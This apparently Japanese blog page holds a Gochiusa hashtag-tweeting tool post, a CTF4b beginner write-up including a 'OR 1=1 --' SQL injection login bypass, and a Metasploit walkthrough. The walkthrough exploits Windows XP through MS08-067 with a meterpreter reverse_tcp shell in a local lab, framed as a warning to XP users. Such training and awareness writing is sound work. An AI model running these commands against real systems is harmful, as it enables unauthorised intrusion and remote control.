第3羽 全力刺繍伝説ウサギ隊

(この記事は「ごちうさ Advent Calendar 2015」」の三日目の記事です!)

どうでもいいですが自分今日が誕生日です!!(あと一日誕生日遅かったらなぁ)

前日は@pan_nyaaさんの 「ぱにゃもひ☆BLOG 第2羽 灰色DAWと灰かぶり猫」 でした。

本当は刺繍(クロスステッチ)でごちうさ関連のものを作り上げる予定でしたが思いのほか時間がなく断念..... f:id:kataware8136:20151203205833j:plain

タイトル全然関係ないことやりました。 Twitterでごちうさ実況をしている人たちを見て家にTVがなくつらい思いをしている人間です。

で、そんなごちうさ実況を見ていて思ったのがハッシュタグつけてくのもっと楽にできないかなぁ...
としてやり始めました。出来上がってから調べたんですがそういうのできるクライアントがあるらしいですね....

TwistOAuthを利用して簡単なツール組んでみました。

gochiusaTweet

github.com

です。

大したことはやっていません(断言) やれることですが、

テンプレートツイートとハッシュタグtweet.phpに入れてあるのでこの中身を編集してハッシュタグも変更してしまえばごちうさに限らずいろんなアニメの実況もできます!!

ただコンシューマーキーとか自分で入力しなければいけないので改良の余地があるなぁと、 OAuth認証も後々はやるつもりですがつもりで終わるかもしれません。

でもコンシューマーキー埋めてエイリアス登録してしまえばすぐ実行はできるし、これはこれでありなのかなと思ってます。

これで自分でアニメ実況する際には困らなくなりました(自己満足)。おしまいですw

明日は@kb10uy(比那名居天子)さんです!お願いします!! そして明日は香風智乃、チノちゃんの誕生日です!!!!みんなでお祝いしましょー!! (あ~自分の誕生日あと一日遅ければなぁ)

CTF4b滋賀に参加した話(writeup)

CTF4bとは

CTF for ビギナーズは、コンピュータセキュリティ技術を競う競技であるCTF (Capture The Flag) の初心者を対象とした勉強会です。本勉強会では、CTFに必要な知識や技術を学ぶ専門講義と実際に問題に挑戦してCTFを体験してもらう演習を行います。ここから

ってことで参加してきたので自分が解いた問題と解けたけど提出に間に合わなかった問題のwriteupを書いておこうと思います

writeup

web100

タイトルがlogin as adminっていうwebページがあります。

まぁビギナーだからSQLiで抜いて終わりだろうなーってことで userのところに「'OR 1=1 --」でログインしてみると、ログインしたページにflagが表示されているのでそれを送信しておしまい。

web200

問題のページを開くとflagはhtmlのどこかにあるよと書いてあります。

web問題なのでとりあえずクッキーとかローカルのところとか調べてみるかーとしてクッキーを見たらctf4b~~というクッキーを発見しました。

エンコードされている部分(%3F)があったのでそれをデコードします。

<script>
alert(decodeURIComponent('%3F'));
</script>

とやるとデコードされてた文字が?とわかったのでflagを送信して終了。

flagはctf4b{web200_is_7oo_3asy_4_u?}

bin200

もらったファイルをfileコマンドで見てみるとpngファイルとでてきます。

なので拡張子を変更してみてみると次の画像が出ます。

f:id:kataware8136:20151003231922p:plain

どこかで見たようなアイコンが....

このままではflagは見えないのでstringsコマンドで調べると、最後のほうにHint[strings+grep]とかでてます。

strings bin200.png | grep ctf4b

でflagを抜き出して終わり。

flagはctf4b{Are_you_megrep-per?}

bin100

間に合わなかった問題

渡されたファイルをfileコマンドで調べて拡張子を変え、新たに出たファイルをまた調べて拡張子を変えの繰り返し。

最終的にはjpgあたりの画像がでてくる

flagはctf4b{USY_1989_OVA}

net100

解いたのだがファイルを落とすの忘れたせいでどんな問題だったかあやふや。

確かpcapファイルのhttpあたりでfollow tcp streamをやるとflagがそのままあったはず。

net200

pcapファイルを渡される。中身を見るとどうやらtelnetをやってるようだ。

ユーザーとパスワードが簡単に見れるのと問題にサーバーにアクセスしようみたいなことが書いてある。

telnetの使い方を知らず轟沈。頼みの携帯も圏外で死亡。

解答でtelnetでつなげば終わりだったらしい。つらい

net300

今度はftpのpcapファイルを渡される。

とりあえずftp-dataの最初のfollowtcpstreamをみるとtxt,zip,txtとftpを利用してる

残りの3つのパケットをfollotcpstreamで見たりsave asしたりしてつなげるとflagができあがる。

flagはctf4b{This_communication_is_not_encrypted.}

追加のbin300

IDAdemoつかってSetIPとかを利用して終わる関数にとばさないようにしていく

test eax eax
jnz 

の部分のtestに進めるとエラーが起きるのでその直前にブレークポイントを設定してsetIPで飛ばしていきます。

最後にanswerの関数に飛ばすと答えがとれます

f:id:kataware8136:20151005205848p:plain

終わりにde

ctf4b意外と時間が短いから焦るし、最初のほう設定されてたflagが間違っていてweb100で10分くらい考えてしまっていてもったいなかった感じがいなめない。そして違和感を覚えたら運営にちゃんと聞くってことを覚えました。

あとは普段からネットに頼りすぎだということでデコードの方法を忘れるとかでもうちょっと頭の中にある知識を増やしておかないと上にいけないと感じたctf4bでした。

次のctf4b大阪とかいけたらがんばりたいですね。

500の問題とか解けたら更新するかも??

Kali Linux使ってXPをハックする

はじめに

この記事はXPを例としてハックしますが奨励してるわけではありません。逆に今でもXP使ってる人に見せてこんなに簡単にハックされるんだよってことを知らせて、XPの使用を減らしてもらいたいと考えての記事となります。

またこれはyoutubeの動画を参照しつつ、自分でやってみた結果です。英語雑魚なのでこの意味違うぞってのがあれば遠慮なく突っ込んでもらえるとありがたいです。

準備・環境

当然ですがXPをインターネットにつなげると危険なので,ローカル環境で行います。 kali linux
ip:192.168.0.3
Windows XP
ip:192.168.0.2

自分で試す人はこれから先のipは自分の環境のipに読みかえてください

ポートの確認

まずはポートの確認をします。exploitができるのは445ポートのmicrosoft-dsなのでそのポートが開いていることを以下のコマンドで確認します。

nmap -n -sV 192.168.0.2

445/tcp openと表示されればokです。 表示されてない場合はポート開放されていないので「コントロールパネル」→「ファイアーウォールの設定」から「ファイルとプリンタの共有」のところのポートを開放してください

参考:ポート開放について

metasploitの利用

msfconsoleを開く

msfconsoleを開きます。kali linuxの場合はターミナルで

msfconsole

とたたくか、「アプリケーション」→「Kali Linux」→「Exploitation Tools」→「Metasploit」→「metasploit framework」を選択するとmsfconsoleが開きます。

useコマンドを使う

useコマンドはexploit対象を決める(言葉があってるか自信がない) なのでまず対象を決めます。今回は対象がsmbなのでsmbをキーワードとして検索をかけてみます。

msf > search name: smb

すると対象がたくさん出てくると思います。今回は /exploit/windows/smb/ms08_067_netapi というのを対象とします。

そうしたらinfoコマンドで情報を見ます。

msf > info exploit/windows/smb/ms08_067_netapi

そうすると対象だったりなどの情報が見られます。 そうしたらuseコマンドを使います

msf > use exploit/windows/smb/ms08_067_netapi

すると以下のようにコンソールが変化します。

msf exploit(ms08_067_netapi) > 

この状態でshow optionsとたたくとオプションが見れます。

攻撃対象の選択

この後は次のようにコマンドを打っていきます

msf exploit(ms08_067_netapi) > set RHOST 192.168.0.2

RHOST => 192.168.0.2

msf exploit(ms08_067_netapi) > set LHOST 192.168.0.3

LHOST => 192.168.0.3

msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp

RHOSTは攻撃対象、つまりwindowsxpipアドレス

LHOSTは今の自分のマシンのipアドレスをsetします

PAYLOADはreverse_tcpを設定します。

これで準備は完了です

exploit

msf exploit(ms08_067_netapi) > exploit

上記を実行すると

meterpreter >

となりハックすることができます。 ここで使えるコマンドは

  • sysinfo:システムの情報を見る

  • ipconfig:ネットワークの情報を見る

  • shell:シェルを起動する

などができます。(だいぶ脅威だよね)

おわりに

今回windowsxpをハックしましたが、かかった時間はなんと2時間くらい。 そのうちローカルネットワークの構築が1時間50分くらい。
(ipの固定がうまくいかなかったり,windowsxpはデフォルトでpingを返さない仕様だしみたいなもろもろの静で時間がかかってた)
環境を構築する必要のない実際の攻撃の場合はxpのipがわかってしまえばものの10分かからずハックができてしまいます。

xpは使わないようにしましょうね.....

参考資料。動画など

Exploit Windows XP using Metasploit/Meterpreter (MS08_067_netapi)

https://www.youtube.com/watch?v=6WMbrcGzNbkwww.youtube.com

Hack windows xp with metasploit Kali Linux

https://www.youtube.com/watch?v=aSvgZCDAg4Ywww.youtube.com

[WindowsXP] ping に応答するように設定する方法 kb.seeck.jp